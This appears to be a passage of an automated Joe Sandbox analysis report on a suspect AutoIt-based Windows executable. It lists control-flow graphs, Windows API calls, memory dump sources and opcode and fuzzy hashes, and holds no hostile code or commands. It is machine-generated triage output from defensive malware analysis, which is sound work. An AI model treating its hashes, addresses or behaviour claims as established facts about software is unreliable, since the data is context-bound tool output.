                                                                        control_flow_graph 557 7ff6bb1325bc-7ff6bb13263d 561 7ff6bb13287e-7ff6bb1328af 557->561 562 7ff6bb132643-7ff6bb13267c 557->562 563 7ff6bb132680-7ff6bb132687 562->563 565 7ff6bb132856-7ff6bb132876 563->565 566 7ff6bb13268d-7ff6bb1326a1 563->566 565->561 568 7ff6bb1326a7-7ff6bb1326bc 566->568 569 7ff6bb17d148-7ff6bb17d14f 566->569 572 7ff6bb1329c8-7ff6bb1329eb PeekMessageW 568->572 573 7ff6bb1326c2-7ff6bb1326c9 568->573 570 7ff6bb17d155 569->570 571 7ff6bb132702-7ff6bb132723 569->571 579 7ff6bb17d15a-7ff6bb17d160 570->579 585 7ff6bb13276e-7ff6bb1327d2 571->585 586 7ff6bb132725-7ff6bb13272c 571->586 574 7ff6bb1326e8-7ff6bb1326ef 572->574 575 7ff6bb1329f1-7ff6bb1329f5 572->575 573->572 576 7ff6bb1326cf-7ff6bb1326d4 573->576 583 7ff6bb17e285-7ff6bb17e293 574->583 584 7ff6bb1326f5-7ff6bb1326fc 574->584 580 7ff6bb17d1aa-7ff6bb17d1bb 575->580 581 7ff6bb1329fb-7ff6bb132a05 575->581 576->572 582 7ff6bb1326da-7ff6bb1326e2 GetInputState 576->582 587 7ff6bb17d19b 579->587 588 7ff6bb17d162-7ff6bb17d176 579->588 580->574 581->579 589 7ff6bb132a0b-7ff6bb132a1d call 7ff6bb142de8 581->589 582->572 582->574 590 7ff6bb17e29d-7ff6bb17e2b5 call 7ff6bb13f1c4 583->590 584->571 584->590 628 7ff6bb1327d8-7ff6bb1327da 585->628 629 7ff6bb17e276 585->629 586->585 591 7ff6bb13272e-7ff6bb132738 586->591 587->580 588->587 593 7ff6bb17d178-7ff6bb17d17f 588->593 605 7ff6bb132a1f-7ff6bb132a2d TranslateMessage DispatchMessageW 589->605 606 7ff6bb132a33-7ff6bb132a4f PeekMessageW 589->606 590->565 596 7ff6bb13273f-7ff6bb132742 591->596 593->587 597 7ff6bb17d181-7ff6bb17d190 TranslateAcceleratorW 593->597 601 7ff6bb132748 596->601 602 7ff6bb1328b0-7ff6bb1328b7 596->602 597->589 603 7ff6bb17d196 597->603 608 7ff6bb13274f-7ff6bb132752 601->608 610 7ff6bb1328b9-7ff6bb1328cc timeGetTime 602->610 611 7ff6bb1328eb-7ff6bb1328ef 602->611 603->606 605->606 606->574 607 7ff6bb132a55 606->607 607->575 612 7ff6bb132758-7ff6bb132761 608->612 613 7ff6bb1328f4-7ff6bb1328fb 608->613 615 7ff6bb17d2ab-7ff6bb17d2b0 610->615 616 7ff6bb1328d2-7ff6bb1328d7 610->616 611->596 622 7ff6bb132767 612->622 623 7ff6bb17d4c7-7ff6bb17d4ce 612->623 620 7ff6bb17d2f8-7ff6bb17d303 613->620 621 7ff6bb132901-7ff6bb132905 613->621 617 7ff6bb1328dc-7ff6bb1328e5 615->617 618 7ff6bb17d2b6 615->618 616->617 619 7ff6bb1328d9 616->619 617->611 625 7ff6bb17d2bb-7ff6bb17d2f3 timeGetTime call 7ff6bb142ac0 call 7ff6bb1a3a28 617->625 618->625 619->617 626 7ff6bb17d309-7ff6bb17d30c 620->626 627 7ff6bb17d305 620->627 621->608 622->585 625->611 631 7ff6bb17d312-7ff6bb17d319 626->631 632 7ff6bb17d30e 626->632 627->626 628->629 633 7ff6bb1327e0-7ff6bb1327ee 628->633 629->583 635 7ff6bb17d31b 631->635 636 7ff6bb17d322-7ff6bb17d329 631->636 632->631 633->629 637 7ff6bb1327f4-7ff6bb132819 633->637 635->636 641 7ff6bb17d32b 636->641 642 7ff6bb17d332-7ff6bb17d33d call 7ff6bb1442a0 636->642 638 7ff6bb13290a-7ff6bb13290d 637->638 639 7ff6bb13281f-7ff6bb132829 call 7ff6bb132b70 637->639 645 7ff6bb132931-7ff6bb132933 638->645 646 7ff6bb13290f-7ff6bb132915 call 7ff6bb132e30 638->646 649 7ff6bb13282e-7ff6bb132836 639->649 641->642 642->601 642->623 651 7ff6bb132971-7ff6bb132974 645->651 652 7ff6bb132935-7ff6bb132949 call 7ff6bb1366c0 645->652 657 7ff6bb13291a 646->657 655 7ff6bb13283c 649->655 656 7ff6bb13299e-7ff6bb1329ab 649->656 653 7ff6bb13297a-7ff6bb13299c call 7ff6bb1301a0 651->653 654 7ff6bb17dfbe-7ff6bb17dfc0 651->654 665 7ff6bb13294e-7ff6bb132950 652->665 653->665 660 7ff6bb17dfed-7ff6bb17dff6 654->660 661 7ff6bb17dfc2-7ff6bb17dfc5 654->661 662 7ff6bb132840-7ff6bb132843 655->662 663 7ff6bb1329b1-7ff6bb1329be call 7ff6bb144c24 656->663 664 7ff6bb17e181-7ff6bb17e197 call 7ff6bb144c24 * 2 656->664 657->649 672 7ff6bb17dff8-7ff6bb17e003 660->672 673 7ff6bb17e005-7ff6bb17e00c 660->673 661->662 668 7ff6bb17dfcb-7ff6bb17dfe7 call 7ff6bb133c20 661->668 669 7ff6bb132849-7ff6bb132850 662->669 670 7ff6bb132b17-7ff6bb132b1d 662->670 663->572 664->629 665->649 674 7ff6bb132956-7ff6bb132966 665->674 668->660 669->563 669->565 670->669 675 7ff6bb132b23-7ff6bb132b2d 670->675 679 7ff6bb17e00f-7ff6bb17e016 call 7ff6bb1b8b98 672->679 673->679 674->649 680 7ff6bb13296c 674->680 675->569 689 7ff6bb17e01c-7ff6bb17e036 call 7ff6bb1a34e4 679->689 690 7ff6bb17e0d7-7ff6bb17e0d9 679->690 684 7ff6bb17e0f4-7ff6bb17e10e call 7ff6bb1a34e4 680->684 692 7ff6bb17e147-7ff6bb17e14e 684->692 693 7ff6bb17e110-7ff6bb17e11d 684->693 702 7ff6bb17e038-7ff6bb17e045 689->702 703 7ff6bb17e06f-7ff6bb17e076 689->703 694 7ff6bb17e0db 690->694 695 7ff6bb17e0df-7ff6bb17e0ee call 7ff6bb1ba320 690->695 692->669 696 7ff6bb17e154-7ff6bb17e15a 692->696 699 7ff6bb17e135-7ff6bb17e142 call 7ff6bb144c24 693->699 700 7ff6bb17e11f-7ff6bb17e130 call 7ff6bb144c24 * 2 693->700 694->695 695->684 696->669 701 7ff6bb17e160-7ff6bb17e169 696->701 699->692 700->699 701->664 707 7ff6bb17e05d-7ff6bb17e06a call 7ff6bb144c24 702->707 708 7ff6bb17e047-7ff6bb17e058 call 7ff6bb144c24 * 2 702->708 703->669 710 7ff6bb17e07c-7ff6bb17e082 703->710 707->703 708->707 710->669 715 7ff6bb17e088-7ff6bb17e091 710->715 715->690
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                        • String ID:
                                                                        • API String ID: 3249950245-0
                                                                        • Opcode ID: 9eccb3f4b5c811a536024e374ea0d15e5a811994ad6da7f8a72b18085257e0b4
                                                                        • Instruction ID: 640ec192a58051ab52dc9ce4f9a4fcea90b5951b3dbfc37890a104d330b16dc8
                                                                        • Opcode Fuzzy Hash: 9eccb3f4b5c811a536024e374ea0d15e5a811994ad6da7f8a72b18085257e0b4
                                                                        • Instruction Fuzzy Hash: 3A22AD72A0CA868AEB74DB29E4903B927A0FB49B4CF144136DB4E836B5DF7DE445C740

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 849 7ff6bb123cbc-7ff6bb123d88 CreateWindowExW * 2 ShowWindow * 2
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Create$Show
                                                                        • String ID: AutoIt v3$d$edit
                                                                        • API String ID: 2813641753-2600919596
                                                                        • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                        • Instruction ID: 0397ceff4338b9f321e1fdd8b75049a900741ae82671cf5ef477ff2ff77a7a57
                                                                        • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                        • Instruction Fuzzy Hash: A9215C72A28B41CAEB14CB18F48976A77A0F78C799F144238E78D86664CFBED045CB04

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00007FF6BB142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF6BB127FA5), ref: 00007FF6BB142D8E
                                                                          • Part of subcall function 00007FF6BB142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF6BB127FA5), ref: 00007FF6BB142D9C
                                                                          • Part of subcall function 00007FF6BB142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF6BB127FA5), ref: 00007FF6BB142DAC
                                                                          • Part of subcall function 00007FF6BB142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF6BB127FA5), ref: 00007FF6BB142DBC
                                                                          • Part of subcall function 00007FF6BB142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF6BB127FA5), ref: 00007FF6BB142DCA
                                                                          • Part of subcall function 00007FF6BB142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF6BB127FA5), ref: 00007FF6BB142DD8
                                                                          • Part of subcall function 00007FF6BB13EEC8: RegisterWindowMessageW.USER32 ref: 00007FF6BB13EF76
                                                                        • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BB12106D), ref: 00007FF6BB128209
                                                                        • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BB12106D), ref: 00007FF6BB12828F
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BB12106D), ref: 00007FF6BB16D36A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                        • String ID: AutoIt
                                                                        • API String ID: 1986988660-2515660138
                                                                        • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                        • Instruction ID: 2ab46715fe745966601e71ad3eb271fad6f23e259a9426a1d88fe888e87af853
                                                                        • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                        • Instruction Fuzzy Hash: 48C1F631D18B6689E648DF1CEA8207677A4FF9D344F58023AE64DC2671EF7EA141C790

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                        • String ID: Line:
                                                                        • API String ID: 3135491444-1585850449
                                                                        • Opcode ID: d297a7005dd5db4d80d7ddfa981a4a2ba83f86c4ab3c19e1d6fa449eee743d8e
                                                                        • Instruction ID: a75e3aabb3544560175ad05d5193e744928dfb49097bb796a2be02e035d8a6f9
                                                                        • Opcode Fuzzy Hash: d297a7005dd5db4d80d7ddfa981a4a2ba83f86c4ab3c19e1d6fa449eee743d8e
                                                                        • Instruction Fuzzy Hash: 76415772A0C68696E724DB28D4412FA2361FB4D38CF945031D74D836BADF7DDA44CB50
                                                                        APIs
                                                                        • GetOpenFileNameW.COMDLG32 ref: 00007FF6BB16BAA2
                                                                          • Part of subcall function 00007FF6BB1256D4: GetFullPathNameW.KERNEL32(?,00007FF6BB1256C1,?,00007FF6BB127A0C,?,?,?,00007FF6BB12109E), ref: 00007FF6BB1256FF
                                                                          • Part of subcall function 00007FF6BB123EB4: GetLongPathNameW.KERNELBASE ref: 00007FF6BB123ED8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Name$Path$FileFullLongOpen
                                                                        • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                        • API String ID: 779396738-2360590182
                                                                        • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                        • Instruction ID: f361dcf238719f6611ad29c16556a703da98641906c2f6c157685f089661991b
                                                                        • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                        • Instruction Fuzzy Hash: 4E312A72608B8289E710DB29E8401A9B7A4FB4EB88F584175DB8D87B66DF7CD545CB00
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF6BB126F52,?,?,?,?,?,?,00007FF6BB12782C), ref: 00007FF6BB126FA5
                                                                        • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF6BB126F52,?,?,?,?,?,?,00007FF6BB12782C), ref: 00007FF6BB126FD3
                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF6BB126F52,?,?,?,?,?,?,00007FF6BB12782C), ref: 00007FF6BB126FFA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                        • Instruction ID: 8d49a1a9b6f050a2ce40a9f0a2ffd73fbc797690e9dedca0687d838a7f66b252
                                                                        • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                        • Instruction Fuzzy Hash: 1A215B33A18B4187D7508F29F45096E73A4FB5EB88B441135EB8D83B64DF39E814CB44
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitTerminate
                                                                        • String ID:
                                                                        • API String ID: 1703294689-0
                                                                        • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                        • Instruction ID: 6b2a93a9e7b29d96139ed07f17d0589cf926c6f14c05e559ac0ccdf566ea98aa
                                                                        • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                        • Instruction Fuzzy Hash: FEE01A20B0430586EB046F69AC897792352BF8DBADF045038CA0E823A2CE7DE8088600
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Init_thread_footer
                                                                        • String ID: CALL
                                                                        • API String ID: 1385522511-4196123274
                                                                        • Opcode ID: a6f8f33fe4d4fd6ea842ce091de208e213b646c430acc02fb6fb97649c6949bd
                                                                        • Instruction ID: 74d31b0befb0e955898211c536677646a2492540a18f838b96b3b18ac8e0e628
                                                                        • Opcode Fuzzy Hash: a6f8f33fe4d4fd6ea842ce091de208e213b646c430acc02fb6fb97649c6949bd
                                                                        • Instruction Fuzzy Hash: 01226672B08A429AEB25CF69D4902BC37A1FB48B8CF544136DB4D977A9EF38E455C340
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 8728097841867d9633bd17134d567205ec95521954fd3f90ca87c21f00f22551
                                                                        • Instruction ID: 0e3f4e5cede21241345ffe31011688122382ac9c84b8414b03f662b2fa72dc95
                                                                        • Opcode Fuzzy Hash: 8728097841867d9633bd17134d567205ec95521954fd3f90ca87c21f00f22551
                                                                        • Instruction Fuzzy Hash: 4E416C72A0874286F7649F18E41433977A0FB8ABACF144235DB6E876E9CF7DE4448B40
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Library$Load$AddressFreeProc
                                                                        • String ID:
                                                                        • API String ID: 2632591731-0
                                                                        • Opcode ID: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                                        • Instruction ID: a6d049f62959492bf4b52cccb7c121ee2ee6db5e82e2eb421169c85d03891fa6
                                                                        • Opcode Fuzzy Hash: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                                        • Instruction Fuzzy Hash: CF413B22B14A569AEB20DF29D8513BC23A0FB49B8CF454131EB4D876AADF7CD958C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_
                                                                        • String ID:
                                                                        • API String ID: 1144537725-0
                                                                        • Opcode ID: 75f4a0e65c200bc2e40f9fd9660e43366a6e6660fa9f53215bc3a0a6d933da49
                                                                        • Instruction ID: 3b5be988341553ed743dd2c93e39344cdd90b1107824f25d218c8b4e5f5ffc50
                                                                        • Opcode Fuzzy Hash: 75f4a0e65c200bc2e40f9fd9660e43366a6e6660fa9f53215bc3a0a6d933da49
                                                                        • Instruction Fuzzy Hash: 2A418C32A09B8586EB658F19E4403A933A8FB4DB8CF080135EB4D877A9CF7DE654C750
                                                                        APIs
                                                                        • IsThemeActive.UXTHEME ref: 00007FF6BB123756
                                                                          • Part of subcall function 00007FF6BB149334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB149348
                                                                          • Part of subcall function 00007FF6BB1236E8: SystemParametersInfoW.USER32 ref: 00007FF6BB123705
                                                                          • Part of subcall function 00007FF6BB1236E8: SystemParametersInfoW.USER32 ref: 00007FF6BB123725
                                                                          • Part of subcall function 00007FF6BB1237B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6BB123785), ref: 00007FF6BB1237F2
                                                                          • Part of subcall function 00007FF6BB1237B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF6BB123785), ref: 00007FF6BB123807
                                                                          • Part of subcall function 00007FF6BB1237B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF6BB123785), ref: 00007FF6BB12388D
                                                                          • Part of subcall function 00007FF6BB1237B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6BB123785), ref: 00007FF6BB123924
                                                                        • SystemParametersInfoW.USER32 ref: 00007FF6BB123797
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 4207566314-0
                                                                        • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                        • Instruction ID: dd69c789a58ea403dbedaa251fe863f47f54b1e5e9371ea09ac1118adbcd66b5
                                                                        • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                        • Instruction Fuzzy Hash: 0D01F670E0C2528EF718ABA9F9565B6A661FF4D708F480035E70DC62B2DE3EB4858701
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
